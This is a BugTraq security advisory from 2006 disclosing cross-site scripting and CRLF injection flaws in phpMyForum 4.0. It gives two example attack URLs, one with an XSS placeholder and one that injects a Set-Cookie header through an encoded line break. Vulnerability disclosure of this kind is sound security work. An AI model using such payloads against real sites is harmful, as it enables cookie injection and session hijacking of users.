BugTraq
phpMyForum Cross Site Scripting & CRLF injection Apr 10 2006 09:56AM
root__ linuxmail org
Title : phpMyForum Cross Site Scripting & CRLF injection
Author: Mourad aka Psych0
Moroccan Security Team
Vendor: www.phpmyforum.de
Version: 4.0

Examples:

http://target/path/index.php?page=[xsscode]&type=text%2Fcss

http://target/path/index.php?template=css&type=some_url%0d%0aSet-Cookie%
3Aheader

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus